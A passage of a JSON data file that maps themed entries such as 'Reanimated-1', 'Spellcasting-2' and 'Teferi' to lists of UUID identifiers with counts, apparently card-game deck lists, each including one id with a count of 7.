"count": 1
},
{
"id": "7da93bf0-2075-4e36-b69b-3db3d4288e7a",
"count": 1
},
{
"id": "5538bc51-e320-437e-867d-0d01621e31fb",
"count": 1
},
{
"id": "b78765aa-f952-47f5-b6fc-8aca93fc4104",
"count": 1
},
{
"id": "ed111116-c2cc-4c97-a84c-f9576ea2ada7",
"count": 1
},
{
"id": "eedce8ab-771a-4247-9504-72ae0629df83",
"count": 1
},
{
"id": "0c1632bd-30bc-40a2-963f-44be3b42efb3",
"count": 1
},
{
"id": "b8e9f488-db24-4bcd-bdf9-38c1e50f5504",
"count": 1
},
{
"id": "05f0092a-b642-41be-a907-4c8931962ef9",
"count": 1
},
{
"id": "c64771e8-94bb-452b-b028-619ed3b4327c",
"count": 1
},
{
"id": "a6f25660-97ec-4308-bc5b-1ee405b23399",
"count": 1
},
{
"id": "c0a9fbb3-9fe4-4ec6-82f0-3bb101524e1e",
"count": 1
},
{
"id": "8a2c2fea-d657-49f1-af03-d5d3fef3ead0",
"count": 1
},
{
"id": "637ab0de-6691-4a45-95ac-9b75721c6c5a",
"count": 1
},
{
"id": "4be96696-aff8-4ef9-97dc-8221ef745de9",
"count": 1
},
{
"id": "fc9a66a1-367c-4035-a22e-00fab55be5a0",
"count": 1
},
{
"id": "30b3d647-3546-4ade-b395-f2370750a7a6",
"count": 1
},
{
"id": "b92c8925-ecfc-4ece-b83a-f12e98a938ab",
"count": 1
},
{
"id": "3279314f-d639-4489-b2ab-3621bb3ca64b",
"count": 1
}
],
"Reanimated-1": [
{
"id": "83437022-ba00-4370-83c2-ce1260336fcc",
"count": 1
},
{
"id": "4fefd7f9-57ff-41bb-aef6-b1d568a7588b",
"count": 1
},
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "e49bddc9-0b0b-4d6d-a708-019356f9649e",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "652271a0-80e8-4b9b-8823-26c1528378fc",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Reanimated-2": [
{
"id": "31df3d95-bbdb-449d-9601-4fa844c3c640",
"count": 1
},
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "c5776bc9-7295-4143-a453-64e3c681f8e7",
"count": 1
},
{
"id": "652271a0-80e8-4b9b-8823-26c1528378fc",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Reanimated-3": [
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "d3c5eb7a-abb2-46bd-8fbd-19af63e70c9c",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "8b39ee60-c467-4145-8ca7-123eef01791e",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "5f1cdcba-a04a-4a2f-8bc1-0dd7fa03754d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "c9ce5007-56ab-4361-8130-df48add1492b",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Reanimated-4": [
{
"id": "31df3d95-bbdb-449d-9601-4fa844c3c640",
"count": 1
},
{
"id": "beed7579-f4f1-4545-9653-4c1179e88dc8",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "405c096c-a94b-4817-8c7f-f0551f6513e3",
"count": 1
},
{
"id": "d9dc87b3-60b2-4cf8-b620-334700db1aa9",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "ecb5fb06-d7b3-4871-a530-9004110596ad",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "7c0e1064-47c3-4f03-a1f2-3bcb356db82b",
"count": 1
},
{
"id": "db574719-746a-433e-a5be-06d232a01021",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "3810ec60-3f93-46c0-af39-7628b77bacec",
"count": 7
}
],
"Rogues-1": [
{
"id": "2eb69961-0053-476f-b58e-20b6df0e2649",
"count": 1
},
{
"id": "381b4e3b-85d7-4f61-b395-f278f212bda7",
"count": 1
},
{
"id": "f7b6e993-1988-4b6d-970e-be71d95cf21a",
"count": 1
},
{
"id": "d61b4b71-3cbb-4422-8ce7-657ca3bb6a82",
"count": 1
},
{
"id": "c894372f-7d28-4035-b45a-384c5bf8fd1f",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "85b4b7f9-dfc6-4995-bd41-ff04c98d4c37",
"count": 1
},
{
"id": "a8962e7d-b14d-41b5-8805-17490b6c32bf",
"count": 1
},
{
"id": "6e4c9574-1ee3-461e-848f-8f02c6a8b7ee",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "4e8dd5c5-823a-47f2-8b12-8005d89fe948",
"count": 1
},
{
"id": "794fe9d4-2af4-40b0-bbb2-8015b6206972",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "c8ea7816-e501-4384-9176-61819a1784f6",
"count": 7
}
],
"Rogues-2": [
{
"id": "11f7bdf8-505e-4ed2-8a3b-aba263afd196",
"count": 1
},
{
"id": "4cd6d782-ce5a-4994-8310-34faf9c41de2",
"count": 1
},
{
"id": "381b4e3b-85d7-4f61-b395-f278f212bda7",
"count": 1
},
{
"id": "d61b4b71-3cbb-4422-8ce7-657ca3bb6a82",
"count": 1
},
{
"id": "c894372f-7d28-4035-b45a-384c5bf8fd1f",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "85b4b7f9-dfc6-4995-bd41-ff04c98d4c37",
"count": 1
},
{
"id": "a8962e7d-b14d-41b5-8805-17490b6c32bf",
"count": 1
},
{
"id": "6e4c9574-1ee3-461e-848f-8f02c6a8b7ee",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "4e8dd5c5-823a-47f2-8b12-8005d89fe948",
"count": 1
},
{
"id": "794fe9d4-2af4-40b0-bbb2-8015b6206972",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "c8ea7816-e501-4384-9176-61819a1784f6",
"count": 7
}
],
"Seismic": [
{
"id": "a2b4cbb7-c9ad-4320-9322-a6a3afbc4a50",
"count": 1
},
{
"id": "128f37ff-eb63-4417-87c2-96a3a026fcf4",
"count": 1
},
{
"id": "78c3c616-1f95-41b1-a624-79d6362d4f16",
"count": 1
},
{
"id": "a359f4a8-3c06-441a-81bd-e3773b122e45",
"count": 1
},
{
"id": "9dcec0d7-897e-4593-bd09-460207e28c90",
"count": 1
},
{
"id": "a5664b7d-b553-4e0a-93ec-3d70e8e4f63b",
"count": 1
},
{
"id": "2975ce11-589a-4da8-a016-854bbaeb869c",
"count": 1
},
{
"id": "feebd1ba-758f-4029-9f5c-19b07146b80d",
"count": 1
},
{
"id": "ecba926b-915c-4dd2-84f3-019775e1cc14",
"count": 1
},
{
"id": "7e22c791-6ef9-4f13-a14d-4f795f48bb1c",
"count": 1
},
{
"id": "de1aa8f9-8200-4ddd-9ab5-1a8181cc1792",
"count": 1
},
{
"id": "f8c54d41-683e-42fd-8aa4-371dddf3bcb3",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "cb524a84-34a4-43bf-9872-b4a053a141b5",
"count": 7
}
],
"Smashing-1": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "21a3f8d6-80ff-4292-871e-e19907841448",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "e854e6a3-8684-43fa-9560-ef4c3b62c935",
"count": 1
},
{
"id": "55a95e99-4398-4263-90bc-1b0c544b18b1",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Smashing-2": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "5b32bb8a-ff23-436d-8e63-bbaf05e830ca",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "55a95e99-4398-4263-90bc-1b0c544b18b1",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "973c166e-3e93-4ed5-b4c5-84dc158a8e4f",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Smashing-3": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "368ee4e3-c9eb-4898-99cd-bbe148936f99",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "6c59a4db-5806-40da-8752-cec05af6bf51",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "e854e6a3-8684-43fa-9560-ef4c3b62c935",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "bb9c6068-cfd8-4371-b549-e474d573e52e",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Smashing-4": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "dd1a398b-4551-4522-a90a-620c90bd92c7",
"count": 1
},
{
"id": "6075e0a3-a0ab-4a11-8ad2-7dabb071d309",
"count": 1
},
{
"id": "e3132919-58a7-429f-8a0f-9210d3c2c734",
"count": 1
},
{
"id": "99c40669-87fa-4b1e-885f-2d0a626c3a25",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "76e42d07-57d9-4de4-8d41-eb42dd1573ed",
"count": 1
},
{
"id": "d47e9653-2a3a-4d37-8f3d-3dab4f468338",
"count": 1
},
{
"id": "8f42d773-c742-4465-b6d5-31feaba49146",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "2ae12125-73a3-488b-98b8-9f982addac56",
"count": 1
},
{
"id": "cb0e6279-8a66-4124-9def-fa0c83c26db9",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "4e6bce91-f1e6-40d4-9ecc-cafa8d2586b6",
"count": 7
}
],
"Spellcasting-1": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "9feaa623-3422-4997-af7b-f75074af5fa1",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "d7ac8bdd-851f-449d-a108-70578eabf254",
"count": 1
},
{
"id": "d4955455-c708-4f96-ba21-0a6de0e74336",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spellcasting-2": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "6c957c94-3d2d-4b98-8990-cd8909462081",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "218af707-cc60-407e-af20-e21879a0e902",
"count": 1
},
{
"id": "8383e698-0dd7-4f35-aecb-53f0ee746999",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "d4955455-c708-4f96-ba21-0a6de0e74336",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spellcasting-3": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "47361f61-b717-4468-8050-5f28a8fe6754",
"count": 1
},
{
"id": "32d294e8-ed96-4584-b4f2-1b03ae6d1314",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "cdb5eab0-5397-4c00-8cef-7d3baf38a171",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spellcasting-4": [
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "869fb9f1-0d59-4874-aa52-ac665c3cc0e8",
"count": 1
},
{
"id": "6c957c94-3d2d-4b98-8990-cd8909462081",
"count": 1
},
{
"id": "dc5e8221-fc2d-4d90-80f3-729606648c54",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b37c1b56-621a-4908-89b2-21622d195223",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "8257c205-00cd-4d41-bd58-098575ea2343",
"count": 1
},
{
"id": "55a3153e-4259-4e03-bf79-8979d3c0db36",
"count": 1
},
{
"id": "bd0b8aee-fbfb-470f-9ac2-64fce0b4b2fb",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "c55498ad-f474-4805-b9e9-592ec1c8a8e5",
"count": 7
}
],
"Spirits-1": [
{
"id": "52b2d108-16f2-4d9b-abc8-83ee3d2e8baf",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "87c1aaff-ab26-437e-a88a-494683aec831",
"count": 1
},
{
"id": "768c0715-416c-4316-98ef-ff90bb3112ae",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "7d6d0c71-d1c8-4eb0-96e7-b3325d5fb4c0",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "94c1f80e-65b7-4534-bfd4-1ae88274945b",
"count": 1
},
{
"id": "2600a51b-0dae-431e-a0a7-2b1421706a6a",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "e6cd2ccc-3148-4507-856d-55140c54d09d",
"count": 7
}
],
"Spirits-2": [
{
"id": "52b2d108-16f2-4d9b-abc8-83ee3d2e8baf",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "768c0715-416c-4316-98ef-ff90bb3112ae",
"count": 1
},
{
"id": "505e7f2c-c040-427a-a3a1-e7b36066e4fe",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "7d6d0c71-d1c8-4eb0-96e7-b3325d5fb4c0",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "b832abcc-9ffd-47bf-827a-01b303c610ee",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "e6cd2ccc-3148-4507-856d-55140c54d09d",
"count": 7
}
],
"Spooky-1": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "3dc48b87-62cb-48f6-8979-e6fb98717b52",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "23986add-b33d-4bad-86f3-e2d0f99cf949",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Spooky-2": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "870ebc0b-b748-4a21-b939-a48811451bba",
"count": 1
},
{
"id": "b5e78a44-fff3-4cbf-929b-8dfed4e45d62",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "23986add-b33d-4bad-86f3-e2d0f99cf949",
"count": 1
},
{
"id": "fc676672-1aeb-420a-b909-5a3215cc2ca6",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Spooky-3": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "9342052f-6b6b-40b9-bbc9-7ba3e8365fe1",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "9b53ce1b-9353-42ad-89a0-36e907ba576a",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Spooky-4": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "f8067745-35b6-4abd-9ae9-712159a26c89",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "f1d6e32e-6479-48b3-93ae-da5378c09bb1",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "72bcfb24-1649-4c8f-ba76-346914d11572",
"count": 1
},
{
"id": "b5e78a44-fff3-4cbf-929b-8dfed4e45d62",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "1f51ced8-9384-4b8d-aa60-efb281ac9439",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "85f7b339-cce2-421e-83b8-1764c53dee47",
"count": 7
}
],
"Teferi": [
{
"id": "f4bb655d-8d62-4a79-9a9d-7384d1cb2cc0",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "5449d71c-5c1b-44c6-9407-0212aa3c3e3a",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "2d1ff397-2445-459a-ae4e-7bf1cd48f490",
"count": 1
},
{
"id": "1455f59e-f487-4195-ab25-8fc7695903e4",
"count": 1
},
{
"id": "049955c6-63f5-4f80-8c60-34c890f3c71a",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "c38d1722-96b0-4756-9da9-fe18b1c80649",
"count": 1
},
{
"id": "c26450d4-125f-423d-b074-3c959460c242",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "24aa9fd2-54d9-40d9-9279-abd5bd6ff727",
"count": 7
}
],
"Tree Hugging-1": [
{
"id": "b8664d29-dacc-49cb-949f-e00ceeb75ff6",
"count": 1
},
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "4b0d8dec-e139-4565-9259-3c24c54c1d45",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "ff69e6a8-f34f-4aea-9a54-c4b64ed3116c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Tree Hugging-2": [
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "4b0d8dec-e139-4565-9259-3c24c54c1d45",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "ff69e6a8-f34f-4aea-9a54-c4b64ed3116c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "9d44ec73-169a-4354-8ee1-238b8abd8d81",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
